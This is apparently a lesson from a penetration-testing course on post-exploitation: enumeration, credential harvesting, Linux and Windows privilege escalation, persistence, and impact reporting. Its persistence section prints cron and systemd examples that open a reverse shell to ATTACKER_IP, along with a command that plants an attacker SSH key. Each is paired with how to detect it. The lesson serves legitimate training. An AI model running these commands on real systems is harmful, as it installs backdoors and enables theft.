Pentest Methodology

Post-Exploitation & Looting

After the shell: situational awareness, credential harvesting, persistence concepts, and privilege escalation.

Hard 26 minpost-exploitationlootingpersistence

Getting a shell is not the end - it's the beginning of a new phase with its own questions. You've proven you can get in. Now you need to understand what that means for the organization. What data could an attacker reach? Could they escalate privileges? Move to other systems? How long could they persist undetected? Post-exploitation answers all of this, and it's what transforms a technical access finding into a business impact narrative.

Everything Here Requires Prior Authorization

Post-exploitation techniques - credential harvesting, persistence, privilege escalation, lateral movement - are among the most serious actions you can take on a system. These techniques are illegal on any system you do not own or have explicit written authorization to test. In authorized engagements, they must be performed within the agreed scope. Never install persistence mechanisms on client systems without explicit permission to do so, and always clean up any artifacts you create.

What Post-Exploitation Is For

The purpose of post-exploitation in a penetration test is not to cause maximum damage or achieve maximum access. It is to demonstrate realistic business impact.

The question you're answering for your report: "An attacker who gained this foothold could have..."

  • Read, modified, or exfiltrated sensitive data (define the data category and sensitivity)
  • Escalated to administrative/root access
  • Moved laterally to other systems on the network
  • Established persistent access for long-term presence
  • Disrupted operations

Each of these is a finding with a specific severity level and remediation path. Your post-exploitation work is evidence-gathering for the report.

Situational Awareness: The First Five Minutes

The first thing after landing a shell is to silently map your environment. You want to know where you are, who you are, and what's around you - without making noise.

Understand Your Current User Context

kali@vr4cs: ~

A surprise: www-data can run python3 as any user with no password. That's a misconfigured sudoers entry and a direct privilege escalation path.

Understand the System

kali@vr4cs: ~

eth1 on 10.10.20.5/24 is an internal network interface - this machine is dual-homed. There's an internal network segment reachable from this foothold. This is a pivoting target (covered in the next lesson).

Find Interesting Files and Directories

kali@vr4cs: ~

Credential Harvesting

Credentials found during post-exploitation often enable privilege escalation, lateral movement, or demonstrate direct impact on sensitive systems.

Configuration Files

Web applications almost always store database credentials in configuration files:

kali@vr4cs: ~

The Laravel .env shows a database at 10.10.20.100 - an internal host. That's credential reuse potential and a pivot target.

SSH Keys

kali@vr4cs: ~

Unprotected SSH private keys are critical findings. This key might authenticate to internal systems or allow lateral movement to other servers.

Memory and Process Credential Dumps

On Linux, process memory can sometimes be read to extract credentials. This is noisier but powerful:

kali@vr4cs: ~

NTLM hashes from hashdump can be cracked offline with hashcat or passed directly in pass-the-hash attacks - no cracking required.

Credential Scope and Sensitivity

During authorized testing you will encounter real credentials - production database passwords, service account credentials, private keys. Document what you found (type, location, that credentials exist) without storing the actual credential values in your notes beyond what's needed for the report. Treat credentials with the same care as the most sensitive data they protect.

Post-exploitation and privilege escalation are inseparable. The findings from situational awareness directly feed privilege escalation attempts.

Linux PrivEsc Vectors

The most commonly exploited local privilege escalation vectors on Linux:

Misconfigured sudo:

kali@vr4cs: ~

GTFOBins (gtfobins.github.io) is an invaluable reference - it catalogs how over 200 binaries can be abused for privilege escalation, shell escaping, and file reads when they have sudo, SUID, or capabilities.

SUID/SGID binaries:

kali@vr4cs: ~

Writable cron jobs:

kali@vr4cs: ~

Kernel exploits:

The uname -a from situational awareness gives you the kernel version. Cross-reference against exploit databases: DirtyCow (CVE-2016-5195), PwnKit (CVE-2021-4034), Dirty Pipe (CVE-2022-0847), and dozens of others. Kernel exploits are high-risk - they can crash the system. Run them in a lab first.

Windows PrivEsc Vectors

Similar patterns apply on Windows:

  • Unquoted service paths - services with paths containing spaces that aren't quoted; the OS may execute a malicious binary in an earlier path component
  • Writable service executables - you can replace a service binary that runs as SYSTEM
  • AlwaysInstallElevated - MSI packages install as SYSTEM if this registry key is set
  • SeImpersonatePrivilege - common on service accounts (IIS, SQL Server), exploitable via Potato attacks to escalate to SYSTEM

WinPEAS and LinPEAS are automated enumeration scripts that surface all these vectors systematically. They generate verbose output - learn to read it before you rely on it.

Persistence Concepts (and Their Detection)

Persistence is the ability to maintain access even after the system reboots or the initial exploit vector is patched. In a pentest, persistence is almost always in scope only if explicitly authorized - it's a finding you demonstrate conceptually and then clean up.

Linux Persistence Methods

Cron jobs:

# Add a cron job that calls back every 5 minutes
(crontab -l 2>/dev/null; echo "*/5 * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1") | crontab -

Detection: crontab -l as each user, /etc/cron.d/, /var/spool/cron/crontabs/

SSH authorized_keys:

# Add your public key to the target user's authorized_keys
echo "ssh-rsa AAAA...attacker-key..." >> /home/alice/.ssh/authorized_keys

Detection: monitor ~/.ssh/authorized_keys for changes, SSH login anomaly detection

Systemd services:

# Create a malicious service
cat > /etc/systemd/system/updater.service << EOF
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always
EOF
systemctl enable updater

Detection: systemctl list-unit-files, monitor /etc/systemd/system/

Windows Persistence Methods

  • Registry Run keys - HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled tasks - schtasks /create
  • Service creation - sc create
  • DLL hijacking - placing a malicious DLL in a directory that a service searches before the legitimate DLL location

Each of these has a corresponding detection technique. The defender's playbook: audit startup locations, monitor service creation events, watch for new scheduled tasks, baseline authorized_keys files.

Always Clean Up

In any authorized engagement, every persistence mechanism you install must be removed at the end of the test. Document what you created (exact commands, locations, timestamps), then verify you've removed it. Leaving backdoors on client systems - even by accident - is a serious breach of professional conduct. Agree with the client upfront on exactly what persistence testing is authorized and what cleanup procedures will be followed.

Automated Post-Exploitation Enumeration

Manual enumeration is slow. Automated tools surface findings quickly, but you still need to read and understand the output.

LinPEAS (Linux): Comprehensive automated privilege escalation enumeration. Colors output by severity: red is almost certain to be exploitable, yellow is worth investigating.

kali@vr4cs: ~

WinPEAS (Windows): Equivalent for Windows targets. Can be run as a .exe or .bat.

Metasploit local_exploit_suggester: Checks the target against known local privilege escalation modules in MSF.

kali@vr4cs: ~

Documenting Impact

Post-exploitation findings need to be translated into business impact for the report. The technical finding alone is not enough:

Technical FindingBusiness Impact Statement
Shell as www-dataAccess to web application source code, database credentials
Root via sudo python3Full system compromise - all data, all services
SSH key in /var/wwwLateral movement to other servers using shared credentials
NTLM hashesOffline password cracking; pass-the-hash to other domain systems
Dual-homed networkAccess to internal network segment not reachable from internet

This translation is what your executives need to understand why the technical findings matter.

Key Takeaways

  • Post-exploitation answers "what could an attacker actually do with this foothold?" - it defines business impact.
  • Situational awareness (current user, network interfaces, running processes, active users) is your first five minutes after landing a shell.
  • Credential harvesting targets configuration files, SSH keys, and memory - each can enable lateral movement or privilege escalation.
  • Privilege escalation leverages post-exploitation findings: misconfigured sudo, SUID binaries, writable cron jobs, kernel exploits.
  • Persistence must be explicitly authorized and always cleaned up - document every artifact you create.
  • Automated tools (LinPEAS, WinPEAS, MSF suggester) accelerate enumeration but are not a substitute for understanding what you find.
  • All technical findings must be translated into business impact statements for the report.

Previous

Exploitation & Getting a Shell

Next

Pivoting & Lateral Movement